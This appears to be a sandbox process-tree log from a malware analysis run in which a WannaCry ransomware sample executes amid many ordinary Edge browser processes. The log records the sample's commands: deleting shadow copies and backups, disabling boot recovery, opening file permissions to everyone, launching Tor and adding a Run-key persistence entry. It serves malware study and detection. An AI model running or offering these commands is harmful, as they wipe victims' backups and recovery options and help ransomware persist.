"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --always-read-main-dll --field-trial-handle=7148,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7572 /prefetch:1
1⤵
PID:5296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --always-read-main-dll --field-trial-handle=6304,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=4408 /prefetch:1
1⤵
PID:2868

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --always-read-main-dll --field-trial-handle=6944,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6536 /prefetch:1
1⤵
PID:1060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --always-read-main-dll --field-trial-handle=5420,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7188 /prefetch:1
1⤵
PID:5656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --always-read-main-dll --field-trial-handle=7332,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7120 /prefetch:1
1⤵
PID:5796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4632,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7968 /prefetch:14
1⤵
PID:5792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --always-read-main-dll --field-trial-handle=8164,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:1
1⤵
PID:556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --always-read-main-dll --field-trial-handle=7044,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6700 /prefetch:1
1⤵
PID:4384

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1764

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --always-read-main-dll --field-trial-handle=7828,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=8016 /prefetch:1
1⤵
PID:1100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=6292,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7208 /prefetch:14
1⤵
- NTFS ADS
PID:5124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --always-read-main-dll --field-trial-handle=6312,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7076 /prefetch:1
1⤵
PID:2168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --always-read-main-dll --field-trial-handle=6612,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7968 /prefetch:1
1⤵
PID:5032

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --always-read-main-dll --field-trial-handle=5928,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=5932 /prefetch:1
1⤵
PID:5896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=7876,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:14
1⤵
- NTFS ADS
PID:1204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --always-read-main-dll --field-trial-handle=8168,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=8060 /prefetch:1
1⤵
PID:5508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --always-read-main-dll --field-trial-handle=6464,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6724 /prefetch:1
1⤵
PID:2072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5700,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7096 /prefetch:14
1⤵
PID:5652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=6188,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6060 /prefetch:14
1⤵
PID:5536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --always-read-main-dll --field-trial-handle=6068,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:1
1⤵
PID:5248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --always-read-main-dll --field-trial-handle=7084,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=8216 /prefetch:1
1⤵
PID:5764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --always-read-main-dll --field-trial-handle=6352,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6216 /prefetch:1
1⤵
PID:1912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --always-read-main-dll --field-trial-handle=6800,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=8344 /prefetch:1
1⤵
PID:3968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --always-read-main-dll --field-trial-handle=5936,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:1
1⤵
PID:2380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --always-read-main-dll --field-trial-handle=8220,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=4168 /prefetch:1
1⤵
PID:5232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --always-read-main-dll --field-trial-handle=7652,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7908 /prefetch:1
1⤵
PID:3824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --always-read-main-dll --field-trial-handle=6628,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:1
1⤵
PID:1868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=7100,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7128 /prefetch:14
1⤵
PID:1244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --always-read-main-dll --field-trial-handle=7848,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=4408 /prefetch:1
1⤵
PID:5360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --always-read-main-dll --field-trial-handle=6272,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:1
1⤵
PID:2972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --always-read-main-dll --field-trial-handle=7620,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6688 /prefetch:1
1⤵
PID:2976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --always-read-main-dll --field-trial-handle=7128,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=8408 /prefetch:1
1⤵
PID:4668

C:\Users\Admin\Downloads\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\Downloads\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:5604
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:2060
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - System Location Discovery: System Language Discovery
  PID:6140
- C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 5031739132239.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1168
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4372
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:4908
- C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3260
- - C:\Users\Admin\Downloads\Ransomware.WannaCry\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1408
- - C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2720
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      System Location Discovery: System Language Discovery
      PID:4908
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1168
- C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6040
- C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1912
- C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5748
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lpbxtasfyybx008" /t REG_SZ /d "\"C:\Users\Admin\Downloads\Ransomware.WannaCry\tasksche.exe\"" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4884
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lpbxtasfyybx008" /t REG_SZ /d "\"C:\Users\Admin\Downloads\Ransomware.WannaCry\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5344
- C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5180
- C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2920
- C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5864
- C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5656
- C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1904
- C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2000
- C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2932
- C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2060
- C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x240,0x244,0x248,0x23c,0x28c,0x7ffd053db078,0x7ffd053db084,0x7ffd053db090
  2⤵
  PID:1708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2432,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=2428 /prefetch:2
  2⤵
  PID:1488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1612,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=2568 /prefetch:11
  2⤵
  PID:2776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2068,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:13
  2⤵
  PID:5704
- C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4400,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:14
  2⤵
  PID:4380
- C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4400,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:14
  2⤵
  PID:5216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4712,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=4720 /prefetch:14
  2⤵
  PID:1408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4816,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=4772 /prefetch:1
  2⤵
  PID:1052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4708,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=5012 /prefetch:14
  2⤵
  PID:5944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4560,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=5160 /prefetch:14
  2⤵
  PID:4420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=4496,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:2888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=568,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=5872 /prefetch:14
  2⤵
  PID:4012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=5952 /prefetch:14
  2⤵
  PID:2188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5904,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:14
  2⤵
  PID:2364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5700,i,12116364774211130090,11642648324040632682,262144 --variations-seed-version --mojo-platform-channel-handle=6064 /prefetch:14
  2⤵
  PID:2404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
